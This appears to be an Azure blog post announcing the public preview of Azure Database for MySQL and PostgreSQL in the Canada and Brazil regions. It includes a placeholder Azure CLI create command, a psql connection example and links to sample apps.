We’re excited to announce the public preview of Azure Database for MySQL and Azure Database for PostgreSQL in Canada (Central and East) and Brazil (Brazil South) data centers. The availability of Azure Database for MySQL and PostgreSQL services in Canada and Brazil provides app developers the ability to choose from an even larger number of geographical regions and deploy their favorite database on Azure, without the complexity of managing and administering the databases.

Azure Database for MySQL and Azure Database for PostgreSQL, built on the community editions of the MySQL and PostgreSQL databases, offer built-in high availability, security, and on-the-fly scaling with minimal downtime. All of this comes with an inclusive pricing model that enables developers to simply focus on developing apps. In addition, you can seamlessly migrate your existing apps without any changes and continue using your existing tools.

Learn more about Azure Database for PostgreSQL and Azure Database for MySQL, or just create a new database with MySQL or PostgreSQL.

You can also read the public preview launch blogs for MySQL and PostgreSQL.

Creating an Azure Database for MySQL in Canada or Brazil

To create a new MySQL database in one of the Canada or Brazil data centers, follow the create process, choosing a new logical server in one of the Canada data centers (Canada Central or Canada East) or the Brazil data center (Brazil South).
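If you prefer scripting, the same server can be created with the Azure CLI. This is a sketch only: the server name, credentials, and resource group are placeholders, and parameter names can differ between CLI versions.

# Requires the Azure CLI and a prior 'az login'; all values are placeholders.
az mysql server create --resource-group myResourceGroup --name mymysqlserver --location canadacentral --admin-user myadmin --admin-password '<a-strong-password>'

Creating a PostgreSQL server follows the same pattern with az postgres server create.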

Creating an Azure Database for PostgreSQL in Canada or Brazil

To create a new PostgreSQL database in one of the Canada or Brazil data centers, follow the create process, choosing a new logical server in one of the Canada data centers (Canada Central or Canada East) or the Brazil data center (Brazil South).
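Once the server is provisioned, you can connect with the standard client tools. Here is a hedged psql example; the server and admin names are placeholders, and note the user@servername login format and the SSL requirement these services use by default:

# All names are placeholders; adjust for your server.
psql "host=mydemoserver.postgres.database.azure.com port=5432 dbname=postgres user=myadmin@mydemoserver sslmode=require"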

Solutions and samples

You can access sample PostgreSQL applications on GitHub, allowing you to deploy our sample Day Planner app, using node.js or Ruby on Rails, on your own Azure subscription with a backend PostgreSQL database. The Day Planner app is a sample application that can be used to manage your day-to-day engagements. The app marks engagements, displays routes between them, and showcases the distance and time required to reach the next engagement.

We also support deploying Azure Web Apps with a MySQL database backend as a template on GitHub.

Developers can accomplish seamless connectivity to our PostgreSQL and MySQL services using the native tools they are used to. Developers can also continue to develop using Python, node.js, Java, PHP, or any programming language of their choice. We support development with your favorite open source frameworks, such as Django and Flask, among others, and the service works seamlessly with them. If you have a sample application that you would like to host in our GitHub repo, or have suggestions and feedback about our sample applications, please feel free to submit a pull request and become a contributor. We love working with our community to provide ready-to-go applications for the community at large.

Feedback

As with all new feature releases, we would love to receive your feedback. Feel free to leave comments below. You can also engage with us directly through User Voice for PostgreSQL and MySQL if you have suggestions on how we can further improve the service.

Sunil Kamath
Twitter: @kamathsun
Source: Azure